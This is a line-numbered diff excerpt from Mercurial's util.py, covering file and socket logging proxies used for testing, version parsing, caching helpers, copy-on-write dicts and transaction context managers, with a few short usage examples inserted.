425 425 except ValueError:
426 426 # Empty files cannot be mmapped, but mmapread should still work. Check
427 427 # if the file is empty, and if so, return an empty buffer.
428 428 if os.fstat(fd).st_size == 0:
429 429 return b''
430 430 raise
431 431
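# Editor's example (illustrative; path is hypothetical): memory-map a file
# read-only, falling back to b'' for empty files, which mmap rejects.
with open('data.bin', 'rb') as fp:
    data = mmapread(fp)
    print(len(data))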
432 432
433 433 class fileobjectproxy(object):
434 434 """A proxy around file objects that tells a watcher when events occur.
435 435
436 436 This type is intended to only be used for testing purposes. Think hard
437 437 before using it in important code.
438 438 """
439 439
440 440 __slots__ = (
441 441 r'_orig',
442 442 r'_observer',
443 443 )
444 444
445 445 def __init__(self, fh, observer):
446 446 object.__setattr__(self, r'_orig', fh)
447 447 object.__setattr__(self, r'_observer', observer)
448 448
449 449 def __getattribute__(self, name):
450 450 ours = {
451 451 r'_observer',
452 452 # IOBase
453 453 r'close',
454 454 # closed is a property
455 455 r'fileno',
456 456 r'flush',
457 457 r'isatty',
458 458 r'readable',
459 459 r'readline',
460 460 r'readlines',
461 461 r'seek',
462 462 r'seekable',
463 463 r'tell',
464 464 r'truncate',
465 465 r'writable',
466 466 r'writelines',
467 467 # RawIOBase
468 468 r'read',
469 469 r'readall',
470 470 r'readinto',
471 471 r'write',
472 472 # BufferedIOBase
473 473 # raw is a property
474 474 r'detach',
475 475 # read defined above
476 476 r'read1',
477 477 # readinto defined above
478 478 # write defined above
479 479 }
480 480
481 481 # We only observe some methods.
482 482 if name in ours:
483 483 return object.__getattribute__(self, name)
484 484
485 485 return getattr(object.__getattribute__(self, r'_orig'), name)
486 486
487 487 def __nonzero__(self):
488 488 return bool(object.__getattribute__(self, r'_orig'))
489 489
490 490 __bool__ = __nonzero__
491 491
492 492 def __delattr__(self, name):
493 493 return delattr(object.__getattribute__(self, r'_orig'), name)
494 494
495 495 def __setattr__(self, name, value):
496 496 return setattr(object.__getattribute__(self, r'_orig'), name, value)
497 497
498 498 def __iter__(self):
499 499 return object.__getattribute__(self, r'_orig').__iter__()
500 500
501 501 def _observedcall(self, name, *args, **kwargs):
502 502 # Call the original object.
503 503 orig = object.__getattribute__(self, r'_orig')
504 504 res = getattr(orig, name)(*args, **kwargs)
505 505
506 506 # Call a method on the observer of the same name with arguments
507 507 # so it can react, log, etc.
508 508 observer = object.__getattribute__(self, r'_observer')
509 509 fn = getattr(observer, name, None)
510 510 if fn:
511 511 fn(res, *args, **kwargs)
512 512
513 513 return res
514 514
515 515 def close(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'close', *args, **kwargs
518 518 )
519 519
520 520 def fileno(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'fileno', *args, **kwargs
523 523 )
524 524
525 525 def flush(self, *args, **kwargs):
526 526 return object.__getattribute__(self, r'_observedcall')(
527 527 r'flush', *args, **kwargs
528 528 )
529 529
530 530 def isatty(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'isatty', *args, **kwargs
533 533 )
534 534
535 535 def readable(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readable', *args, **kwargs
538 538 )
539 539
540 540 def readline(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readline', *args, **kwargs
543 543 )
544 544
545 545 def readlines(self, *args, **kwargs):
546 546 return object.__getattribute__(self, r'_observedcall')(
547 547 r'readlines', *args, **kwargs
548 548 )
549 549
550 550 def seek(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'seek', *args, **kwargs
553 553 )
554 554
555 555 def seekable(self, *args, **kwargs):
556 556 return object.__getattribute__(self, r'_observedcall')(
557 557 r'seekable', *args, **kwargs
558 558 )
559 559
560 560 def tell(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'tell', *args, **kwargs
563 563 )
564 564
565 565 def truncate(self, *args, **kwargs):
566 566 return object.__getattribute__(self, r'_observedcall')(
567 567 r'truncate', *args, **kwargs
568 568 )
569 569
570 570 def writable(self, *args, **kwargs):
571 571 return object.__getattribute__(self, r'_observedcall')(
572 572 r'writable', *args, **kwargs
573 573 )
574 574
575 575 def writelines(self, *args, **kwargs):
576 576 return object.__getattribute__(self, r'_observedcall')(
577 577 r'writelines', *args, **kwargs
578 578 )
579 579
580 580 def read(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'read', *args, **kwargs
583 583 )
584 584
585 585 def readall(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readall', *args, **kwargs
588 588 )
589 589
590 590 def readinto(self, *args, **kwargs):
591 591 return object.__getattribute__(self, r'_observedcall')(
592 592 r'readinto', *args, **kwargs
593 593 )
594 594
595 595 def write(self, *args, **kwargs):
596 596 return object.__getattribute__(self, r'_observedcall')(
597 597 r'write', *args, **kwargs
598 598 )
599 599
600 600 def detach(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'detach', *args, **kwargs
603 603 )
604 604
605 605 def read1(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'read1', *args, **kwargs
608 608 )
609 609
610 610
611 611 class observedbufferedinputpipe(bufferedinputpipe):
612 612 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
613 613
614 614 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
615 615 bypass ``fileobjectproxy``. Because of this, we need to make
616 616 ``bufferedinputpipe`` aware of these operations.
617 617
618 618 This variation of ``bufferedinputpipe`` can notify observers about
619 619 ``os.read()`` events. It also re-publishes other events, such as
620 620 ``read()`` and ``readline()``.
621 621 """
622 622
623 623 def _fillbuffer(self):
624 624 res = super(observedbufferedinputpipe, self)._fillbuffer()
625 625
626 fn = getattr(self._input._observer, r'osread', None)
626 fn = getattr(self._input._observer, 'osread', None)
627 627 if fn:
628 628 fn(res, _chunksize)
629 629
630 630 return res
631 631
632 632 # We use different observer methods because the operation isn't
633 633 # performed on the actual file object but on us.
634 634 def read(self, size):
635 635 res = super(observedbufferedinputpipe, self).read(size)
636 636
637 fn = getattr(self._input._observer, r'bufferedread', None)
637 fn = getattr(self._input._observer, 'bufferedread', None)
638 638 if fn:
639 639 fn(res, size)
640 640
641 641 return res
642 642
643 643 def readline(self, *args, **kwargs):
644 644 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
645 645
646 fn = getattr(self._input._observer, r'bufferedreadline', None)
646 fn = getattr(self._input._observer, 'bufferedreadline', None)
647 647 if fn:
648 648 fn(res)
649 649
650 650 return res
651 651
652 652
653 653 PROXIED_SOCKET_METHODS = {
654 654 r'makefile',
655 655 r'recv',
656 656 r'recvfrom',
657 657 r'recvfrom_into',
658 658 r'recv_into',
659 659 r'send',
660 660 r'sendall',
661 661 r'sendto',
662 662 r'setblocking',
663 663 r'settimeout',
664 664 r'gettimeout',
665 665 r'setsockopt',
666 666 }
667 667
668 668
669 669 class socketproxy(object):
670 670 """A proxy around a socket that tells a watcher when events occur.
671 671
672 672 This is like ``fileobjectproxy`` except for sockets.
673 673
674 674 This type is intended to only be used for testing purposes. Think hard
675 675 before using it in important code.
676 676 """
677 677
678 678 __slots__ = (
679 679 r'_orig',
680 680 r'_observer',
681 681 )
682 682
683 683 def __init__(self, sock, observer):
684 684 object.__setattr__(self, r'_orig', sock)
685 685 object.__setattr__(self, r'_observer', observer)
686 686
687 687 def __getattribute__(self, name):
688 688 if name in PROXIED_SOCKET_METHODS:
689 689 return object.__getattribute__(self, name)
690 690
691 691 return getattr(object.__getattribute__(self, r'_orig'), name)
692 692
693 693 def __delattr__(self, name):
694 694 return delattr(object.__getattribute__(self, r'_orig'), name)
695 695
696 696 def __setattr__(self, name, value):
697 697 return setattr(object.__getattribute__(self, r'_orig'), name, value)
698 698
699 699 def __nonzero__(self):
700 700 return bool(object.__getattribute__(self, r'_orig'))
701 701
702 702 __bool__ = __nonzero__
703 703
704 704 def _observedcall(self, name, *args, **kwargs):
705 705 # Call the original object.
706 706 orig = object.__getattribute__(self, r'_orig')
707 707 res = getattr(orig, name)(*args, **kwargs)
708 708
709 709 # Call a method on the observer of the same name with arguments
710 710 # so it can react, log, etc.
711 711 observer = object.__getattribute__(self, r'_observer')
712 712 fn = getattr(observer, name, None)
713 713 if fn:
714 714 fn(res, *args, **kwargs)
715 715
716 716 return res
717 717
718 718 def makefile(self, *args, **kwargs):
719 719 res = object.__getattribute__(self, r'_observedcall')(
720 720 r'makefile', *args, **kwargs
721 721 )
722 722
723 723 # The file object may be used for I/O. So we turn it into a
724 724 # proxy using our observer.
725 725 observer = object.__getattribute__(self, r'_observer')
726 726 return makeloggingfileobject(
727 727 observer.fh,
728 728 res,
729 729 observer.name,
730 730 reads=observer.reads,
731 731 writes=observer.writes,
732 732 logdata=observer.logdata,
733 733 logdataapis=observer.logdataapis,
734 734 )
735 735
736 736 def recv(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'recv', *args, **kwargs
739 739 )
740 740
741 741 def recvfrom(self, *args, **kwargs):
742 742 return object.__getattribute__(self, r'_observedcall')(
743 743 r'recvfrom', *args, **kwargs
744 744 )
745 745
746 746 def recvfrom_into(self, *args, **kwargs):
747 747 return object.__getattribute__(self, r'_observedcall')(
748 748 r'recvfrom_into', *args, **kwargs
749 749 )
750 750
751 751 def recv_into(self, *args, **kwargs):
752 752 return object.__getattribute__(self, r'_observedcall')(
753 753 r'recv_into', *args, **kwargs
754 754 )
755 755
756 756 def send(self, *args, **kwargs):
757 757 return object.__getattribute__(self, r'_observedcall')(
758 758 r'send', *args, **kwargs
759 759 )
760 760
761 761 def sendall(self, *args, **kwargs):
762 762 return object.__getattribute__(self, r'_observedcall')(
763 763 r'sendall', *args, **kwargs
764 764 )
765 765
766 766 def sendto(self, *args, **kwargs):
767 767 return object.__getattribute__(self, r'_observedcall')(
768 768 r'sendto', *args, **kwargs
769 769 )
770 770
771 771 def setblocking(self, *args, **kwargs):
772 772 return object.__getattribute__(self, r'_observedcall')(
773 773 r'setblocking', *args, **kwargs
774 774 )
775 775
776 776 def settimeout(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'settimeout', *args, **kwargs
779 779 )
780 780
781 781 def gettimeout(self, *args, **kwargs):
782 782 return object.__getattribute__(self, r'_observedcall')(
783 783 r'gettimeout', *args, **kwargs
784 784 )
785 785
786 786 def setsockopt(self, *args, **kwargs):
787 787 return object.__getattribute__(self, r'_observedcall')(
788 788 r'setsockopt', *args, **kwargs
789 789 )
790 790
791 791
792 792 class baseproxyobserver(object):
793 793 def _writedata(self, data):
794 794 if not self.logdata:
795 795 if self.logdataapis:
796 796 self.fh.write(b'\n')
797 797 self.fh.flush()
798 798 return
799 799
800 800 # Simple case writes all data on a single line.
801 801 if b'\n' not in data:
802 802 if self.logdataapis:
803 803 self.fh.write(b': %s\n' % stringutil.escapestr(data))
804 804 else:
805 805 self.fh.write(
806 806 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
807 807 )
808 808 self.fh.flush()
809 809 return
810 810
811 811 # Data with newlines is written to multiple lines.
812 812 if self.logdataapis:
813 813 self.fh.write(b':\n')
814 814
815 815 lines = data.splitlines(True)
816 816 for line in lines:
817 817 self.fh.write(
818 818 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
819 819 )
820 820 self.fh.flush()
821 821
822 822
823 823 class fileobjectobserver(baseproxyobserver):
824 824 """Logs file object activity."""
825 825
826 826 def __init__(
827 827 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
828 828 ):
829 829 self.fh = fh
830 830 self.name = name
831 831 self.logdata = logdata
832 832 self.logdataapis = logdataapis
833 833 self.reads = reads
834 834 self.writes = writes
835 835
836 836 def read(self, res, size=-1):
837 837 if not self.reads:
838 838 return
839 839 # Python 3 can return None from reads at EOF instead of empty strings.
840 840 if res is None:
841 841 res = b''
842 842
843 843 if size == -1 and res == b'':
844 844 # Suppress pointless read(-1) calls that return
845 845 # nothing. These happen _a lot_ on Python 3, and there
846 846 # doesn't seem to be a better workaround to have matching
847 847 # Python 2 and 3 behavior. :(
848 848 return
849 849
850 850 if self.logdataapis:
851 851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 852
853 853 self._writedata(res)
854 854
855 855 def readline(self, res, limit=-1):
856 856 if not self.reads:
857 857 return
858 858
859 859 if self.logdataapis:
860 860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 861
862 862 self._writedata(res)
863 863
864 864 def readinto(self, res, dest):
865 865 if not self.reads:
866 866 return
867 867
868 868 if self.logdataapis:
869 869 self.fh.write(
870 870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 871 )
872 872
873 873 data = dest[0:res] if res is not None else b''
874 874
875 875 # _writedata() uses "in" operator and is confused by memoryview because
876 876 # characters are ints on Python 3.
877 877 if isinstance(data, memoryview):
878 878 data = data.tobytes()
879 879
880 880 self._writedata(data)
881 881
882 882 def write(self, res, data):
883 883 if not self.writes:
884 884 return
885 885
886 886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 887 # returns the integer bytes written.
888 888 if res is None and data:
889 889 res = len(data)
890 890
891 891 if self.logdataapis:
892 892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 893
894 894 self._writedata(data)
895 895
896 896 def flush(self, res):
897 897 if not self.writes:
898 898 return
899 899
900 900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 901
902 902 # For observedbufferedinputpipe.
903 903 def bufferedread(self, res, size):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write(
909 909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 910 )
911 911
912 912 self._writedata(res)
913 913
914 914 def bufferedreadline(self, res):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write(
920 920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 921 )
922 922
923 923 self._writedata(res)
924 924
925 925
926 926 def makeloggingfileobject(
927 927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 928 ):
929 929 """Turn a file object into a logging file object."""
930 930
931 931 observer = fileobjectobserver(
932 932 logh,
933 933 name,
934 934 reads=reads,
935 935 writes=writes,
936 936 logdata=logdata,
937 937 logdataapis=logdataapis,
938 938 )
939 939 return fileobjectproxy(fh, observer)
940 940
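# Editor's example (illustrative): observe every read on an in-memory
# file, logging API calls and data to stderr.
import io
import sys

_fh = makeloggingfileobject(
    sys.stderr.buffer, io.BytesIO(b'abc'), b'test', logdata=True
)
_fh.read(2)  # stderr: "test> read(2) -> 2: ab"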
941 941
942 942 class socketobserver(baseproxyobserver):
943 943 """Logs socket activity."""
944 944
945 945 def __init__(
946 946 self,
947 947 fh,
948 948 name,
949 949 reads=True,
950 950 writes=True,
951 951 states=True,
952 952 logdata=False,
953 953 logdataapis=True,
954 954 ):
955 955 self.fh = fh
956 956 self.name = name
957 957 self.reads = reads
958 958 self.writes = writes
959 959 self.states = states
960 960 self.logdata = logdata
961 961 self.logdataapis = logdataapis
962 962
963 963 def makefile(self, res, mode=None, bufsize=None):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
968 968
969 969 def recv(self, res, size, flags=0):
970 970 if not self.reads:
971 971 return
972 972
973 973 if self.logdataapis:
974 974 self.fh.write(
975 975 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
976 976 )
977 977 self._writedata(res)
978 978
979 979 def recvfrom(self, res, size, flags=0):
980 980 if not self.reads:
981 981 return
982 982
983 983 if self.logdataapis:
984 984 self.fh.write(
985 985 b'%s> recvfrom(%d, %d) -> %d'
986 986 % (self.name, size, flags, len(res[0]))
987 987 )
988 988
989 989 self._writedata(res[0])
990 990
991 991 def recvfrom_into(self, res, buf, size, flags=0):
992 992 if not self.reads:
993 993 return
994 994
995 995 if self.logdataapis:
996 996 self.fh.write(
997 997 b'%s> recvfrom_into(%d, %d) -> %d'
998 998 % (self.name, size, flags, res[0])
999 999 )
1000 1000
1001 1001 self._writedata(buf[0 : res[0]])
1002 1002
1003 1003 def recv_into(self, res, buf, size=0, flags=0):
1004 1004 if not self.reads:
1005 1005 return
1006 1006
1007 1007 if self.logdataapis:
1008 1008 self.fh.write(
1009 1009 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1010 1010 )
1011 1011
1012 1012 self._writedata(buf[0:res])
1013 1013
1014 1014 def send(self, res, data, flags=0):
1015 1015 if not self.writes:
1016 1016 return
1017 1017
1018 1018 self.fh.write(
1019 1019 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1020 1020 )
1021 1021 self._writedata(data)
1022 1022
1023 1023 def sendall(self, res, data, flags=0):
1024 1024 if not self.writes:
1025 1025 return
1026 1026
1027 1027 if self.logdataapis:
1028 1028 # Returns None on success. So don't bother reporting return value.
1029 1029 self.fh.write(
1030 1030 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1031 1031 )
1032 1032
1033 1033 self._writedata(data)
1034 1034
1035 1035 def sendto(self, res, data, flagsoraddress, address=None):
1036 1036 if not self.writes:
1037 1037 return
1038 1038
1039 1039 if address:
1040 1040 flags = flagsoraddress
1041 1041 else:
1042 1042 flags = 0
1043 1043
1044 1044 if self.logdataapis:
1045 1045 self.fh.write(
1046 1046 b'%s> sendto(%d, %d, %r) -> %d'
1047 1047 % (self.name, len(data), flags, address, res)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def setblocking(self, res, flag):
1053 1053 if not self.states:
1054 1054 return
1055 1055
1056 1056 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1057 1057
1058 1058 def settimeout(self, res, value):
1059 1059 if not self.states:
1060 1060 return
1061 1061
1062 1062 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1063 1063
1064 1064 def gettimeout(self, res):
1065 1065 if not self.states:
1066 1066 return
1067 1067
1068 1068 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1069 1069
1070 1070 def setsockopt(self, res, level, optname, value):
1071 1071 if not self.states:
1072 1072 return
1073 1073
1074 1074 self.fh.write(
1075 1075 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1076 1076 % (self.name, level, optname, value, res)
1077 1077 )
1078 1078
1079 1079
1080 1080 def makeloggingsocket(
1081 1081 logh,
1082 1082 fh,
1083 1083 name,
1084 1084 reads=True,
1085 1085 writes=True,
1086 1086 states=True,
1087 1087 logdata=False,
1088 1088 logdataapis=True,
1089 1089 ):
1090 1090 """Turn a socket into a logging socket."""
1091 1091
1092 1092 observer = socketobserver(
1093 1093 logh,
1094 1094 name,
1095 1095 reads=reads,
1096 1096 writes=writes,
1097 1097 states=states,
1098 1098 logdata=logdata,
1099 1099 logdataapis=logdataapis,
1100 1100 )
1101 1101 return socketproxy(fh, observer)
1102 1102
1103 1103
1104 1104 def version():
1105 1105 """Return version information if available."""
1106 1106 try:
1107 1107 from . import __version__
1108 1108
1109 1109 return __version__.version
1110 1110 except ImportError:
1111 1111 return b'unknown'
1112 1112
1113 1113
1114 1114 def versiontuple(v=None, n=4):
1115 1115 """Parses a Mercurial version string into an N-tuple.
1116 1116
1117 1117 The version string to be parsed is specified with the ``v`` argument.
1118 1118 If it isn't defined, the current Mercurial version string will be parsed.
1119 1119
1120 1120 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1121 1121 returned values:
1122 1122
1123 1123 >>> v = b'3.6.1+190-df9b73d2d444'
1124 1124 >>> versiontuple(v, 2)
1125 1125 (3, 6)
1126 1126 >>> versiontuple(v, 3)
1127 1127 (3, 6, 1)
1128 1128 >>> versiontuple(v, 4)
1129 1129 (3, 6, 1, '190-df9b73d2d444')
1130 1130
1131 1131 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1132 1132 (3, 6, 1, '190-df9b73d2d444+20151118')
1133 1133
1134 1134 >>> v = b'3.6'
1135 1135 >>> versiontuple(v, 2)
1136 1136 (3, 6)
1137 1137 >>> versiontuple(v, 3)
1138 1138 (3, 6, None)
1139 1139 >>> versiontuple(v, 4)
1140 1140 (3, 6, None, None)
1141 1141
1142 1142 >>> v = b'3.9-rc'
1143 1143 >>> versiontuple(v, 2)
1144 1144 (3, 9)
1145 1145 >>> versiontuple(v, 3)
1146 1146 (3, 9, None)
1147 1147 >>> versiontuple(v, 4)
1148 1148 (3, 9, None, 'rc')
1149 1149
1150 1150 >>> v = b'3.9-rc+2-02a8fea4289b'
1151 1151 >>> versiontuple(v, 2)
1152 1152 (3, 9)
1153 1153 >>> versiontuple(v, 3)
1154 1154 (3, 9, None)
1155 1155 >>> versiontuple(v, 4)
1156 1156 (3, 9, None, 'rc+2-02a8fea4289b')
1157 1157
1158 1158 >>> versiontuple(b'4.6rc0')
1159 1159 (4, 6, None, 'rc0')
1160 1160 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1161 1161 (4, 6, None, 'rc0+12-425d55e54f98')
1162 1162 >>> versiontuple(b'.1.2.3')
1163 1163 (None, None, None, '.1.2.3')
1164 1164 >>> versiontuple(b'12.34..5')
1165 1165 (12, 34, None, '..5')
1166 1166 >>> versiontuple(b'1.2.3.4.5.6')
1167 1167 (1, 2, 3, '.4.5.6')
1168 1168 """
1169 1169 if not v:
1170 1170 v = version()
1171 1171 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1172 1172 if not m:
1173 1173 vparts, extra = b'', v
1174 1174 elif m.group(2):
1175 1175 vparts, extra = m.groups()
1176 1176 else:
1177 1177 vparts, extra = m.group(1), None
1178 1178
1179 1179 vints = []
1180 1180 for i in vparts.split(b'.'):
1181 1181 try:
1182 1182 vints.append(int(i))
1183 1183 except ValueError:
1184 1184 break
1185 1185 # (3, 6) -> (3, 6, None)
1186 1186 while len(vints) < 3:
1187 1187 vints.append(None)
1188 1188
1189 1189 if n == 2:
1190 1190 return (vints[0], vints[1])
1191 1191 if n == 3:
1192 1192 return (vints[0], vints[1], vints[2])
1193 1193 if n == 4:
1194 1194 return (vints[0], vints[1], vints[2], extra)
1195 1195
1196 1196
1197 1197 def cachefunc(func):
1198 1198 '''cache the result of function calls'''
1199 1199 # XXX doesn't handle keywords args
1200 1200 if func.__code__.co_argcount == 0:
1201 1201 cache = []
1202 1202
1203 1203 def f():
1204 1204 if len(cache) == 0:
1205 1205 cache.append(func())
1206 1206 return cache[0]
1207 1207
1208 1208 return f
1209 1209 cache = {}
1210 1210 if func.__code__.co_argcount == 1:
1211 1211 # we gain a small amount of time because
1212 1212 # we don't need to pack/unpack the list
1213 1213 def f(arg):
1214 1214 if arg not in cache:
1215 1215 cache[arg] = func(arg)
1216 1216 return cache[arg]
1217 1217
1218 1218 else:
1219 1219
1220 1220 def f(*args):
1221 1221 if args not in cache:
1222 1222 cache[args] = func(*args)
1223 1223 return cache[args]
1224 1224
1225 1225 return f
1226 1226
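# Editor's example (illustrative): cachefunc() works as a decorator for
# pure functions; note the cache is unbounded, unlike lrucachefunc below.
@cachefunc
def _square(x):
    return x * x

assert _square(4) == 16  # computed once, then served from the cache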
1227 1227
1228 1228 class cow(object):
1229 1229 """helper class to make copy-on-write easier
1230 1230
1231 1231 Call preparewrite before doing any writes.
1232 1232 """
1233 1233
1234 1234 def preparewrite(self):
1235 1235 """call this before writes, return self or a copied new object"""
1236 1236 if getattr(self, '_copied', 0):
1237 1237 self._copied -= 1
1238 1238 return self.__class__(self)
1239 1239 return self
1240 1240
1241 1241 def copy(self):
1242 1242 """always do a cheap copy"""
1243 1243 self._copied = getattr(self, '_copied', 0) + 1
1244 1244 return self
1245 1245
1246 1246
1247 1247 class sortdict(collections.OrderedDict):
1248 1248 '''a simple sorted dictionary
1249 1249
1250 1250 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1251 1251 >>> d2 = d1.copy()
1252 1252 >>> d2
1253 1253 sortdict([('a', 0), ('b', 1)])
1254 1254 >>> d2.update([(b'a', 2)])
1255 1255 >>> list(d2.keys()) # should still be in last-set order
1256 1256 ['b', 'a']
1257 1257 '''
1258 1258
1259 1259 def __setitem__(self, key, value):
1260 1260 if key in self:
1261 1261 del self[key]
1262 1262 super(sortdict, self).__setitem__(key, value)
1263 1263
1264 1264 if pycompat.ispypy:
1265 1265 # __setitem__() isn't called as of PyPy 5.8.0
1266 1266 def update(self, src):
1267 1267 if isinstance(src, dict):
1268 1268 src = src.iteritems()
1269 1269 for k, v in src:
1270 1270 self[k] = v
1271 1271
1272 1272
1273 1273 class cowdict(cow, dict):
1274 1274 """copy-on-write dict
1275 1275
1276 1276 Be sure to call d = d.preparewrite() before writing to d.
1277 1277
1278 1278 >>> a = cowdict()
1279 1279 >>> a is a.preparewrite()
1280 1280 True
1281 1281 >>> b = a.copy()
1282 1282 >>> b is a
1283 1283 True
1284 1284 >>> c = b.copy()
1285 1285 >>> c is a
1286 1286 True
1287 1287 >>> a = a.preparewrite()
1288 1288 >>> b is a
1289 1289 False
1290 1290 >>> a is a.preparewrite()
1291 1291 True
1292 1292 >>> c = c.preparewrite()
1293 1293 >>> b is c
1294 1294 False
1295 1295 >>> b is b.preparewrite()
1296 1296 True
1297 1297 """
1298 1298
1299 1299
1300 1300 class cowsortdict(cow, sortdict):
1301 1301 """copy-on-write sortdict
1302 1302
1303 1303 Be sure to call d = d.preparewrite() before writing to d.
1304 1304 """
1305 1305
1306 1306
1307 1307 class transactional(object):
1308 1308 """Base class for making a transactional type into a context manager."""
1309 1309
1310 1310 __metaclass__ = abc.ABCMeta
1311 1311
1312 1312 @abc.abstractmethod
1313 1313 def close(self):
1314 1314 """Successfully closes the transaction."""
1315 1315
1316 1316 @abc.abstractmethod
1317 1317 def release(self):
1318 1318 """Marks the end of the transaction.
1319 1319
1320 1320 If the transaction has not been closed, it will be aborted.
1321 1321 """
1322 1322
1323 1323 def __enter__(self):
1324 1324 return self
1325 1325
1326 1326 def __exit__(self, exc_type, exc_val, exc_tb):
1327 1327 try:
1328 1328 if exc_type is None:
1329 1329 self.close()
1330 1330 finally:
1331 1331 self.release()
1332 1332
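# Editor's example (illustrative): a subclass gets commit-on-success,
# abort-on-exception semantics from the context manager protocol.
class _demotxn(transactional):
    def close(self):
        print('committed')

    def release(self):
        print('released')

with _demotxn():
    pass  # clean exit calls close(), then release() in the finally block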
1333 1333
1334 1334 @contextlib.contextmanager
1335 1335 def acceptintervention(tr=None):
1336 1336 """A context manager that closes the transaction on InterventionRequired
1337 1337
1338 1338 If no transaction was provided, this simply runs the body and returns
1339 1339 """
1340 1340 if not tr:
1341 1341 yield
1342 1342 return
1343 1343 try:
1344 1344 yield
1345 1345 tr.close()
1346 1346 except error.InterventionRequired:
1347 1347 tr.close()
1348 1348 raise
1349 1349 finally:
1350 1350 tr.release()
1351 1351
1352 1352
1353 1353 @contextlib.contextmanager
1354 1354 def nullcontextmanager():
1355 1355 yield
1356 1356
1357 1357
1358 1358 class _lrucachenode(object):
1359 1359 """A node in a doubly linked list.
1360 1360
1361 1361 Holds a reference to nodes on either side as well as a key-value
1362 1362 pair for the dictionary entry.
1363 1363 """
1364 1364
1365 1365 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1366 1366
1367 1367 def __init__(self):
1368 1368 self.next = None
1369 1369 self.prev = None
1370 1370
1371 1371 self.key = _notset
1372 1372 self.value = None
1373 1373 self.cost = 0
1374 1374
1375 1375 def markempty(self):
1376 1376 """Mark the node as emptied."""
1377 1377 self.key = _notset
1378 1378 self.value = None
1379 1379 self.cost = 0
1380 1380
1381 1381
1382 1382 class lrucachedict(object):
1383 1383 """Dict that caches most recent accesses and sets.
1384 1384
1385 1385 The dict consists of an actual backing dict - indexed by original
1386 1386 key - and a doubly linked circular list defining the order of entries in
1387 1387 the cache.
1388 1388
1389 1389 The head node is the newest entry in the cache. If the cache is full,
1390 1390 we recycle head.prev and make it the new head. Cache accesses result in
1391 1391 the node being moved to before the existing head and being marked as the
1392 1392 new head node.
1393 1393
1394 1394 Items in the cache can be inserted with an optional "cost" value. This is
1395 1395 simply an integer that is specified by the caller. The cache can be queried
1396 1396 for the total cost of all items presently in the cache.
1397 1397
1398 1398 The cache can also define a maximum cost. If a cache insertion would
1399 1399 cause the total cost of the cache to go beyond the maximum cost limit,
1400 1400 nodes will be evicted to make room for the new node. This can be used
1401 1401 to e.g. set a max memory limit and associate an estimated bytes size
1402 1402 cost to each item in the cache. By default, no maximum cost is enforced.
1403 1403 """
1404 1404
1405 1405 def __init__(self, max, maxcost=0):
1406 1406 self._cache = {}
1407 1407
1408 1408 self._head = head = _lrucachenode()
1409 1409 head.prev = head
1410 1410 head.next = head
1411 1411 self._size = 1
1412 1412 self.capacity = max
1413 1413 self.totalcost = 0
1414 1414 self.maxcost = maxcost
1415 1415
1416 1416 def __len__(self):
1417 1417 return len(self._cache)
1418 1418
1419 1419 def __contains__(self, k):
1420 1420 return k in self._cache
1421 1421
1422 1422 def __iter__(self):
1423 1423 # We don't have to iterate in cache order, but why not.
1424 1424 n = self._head
1425 1425 for i in range(len(self._cache)):
1426 1426 yield n.key
1427 1427 n = n.next
1428 1428
1429 1429 def __getitem__(self, k):
1430 1430 node = self._cache[k]
1431 1431 self._movetohead(node)
1432 1432 return node.value
1433 1433
1434 1434 def insert(self, k, v, cost=0):
1435 1435 """Insert a new item in the cache with optional cost value."""
1436 1436 node = self._cache.get(k)
1437 1437 # Replace existing value and mark as newest.
1438 1438 if node is not None:
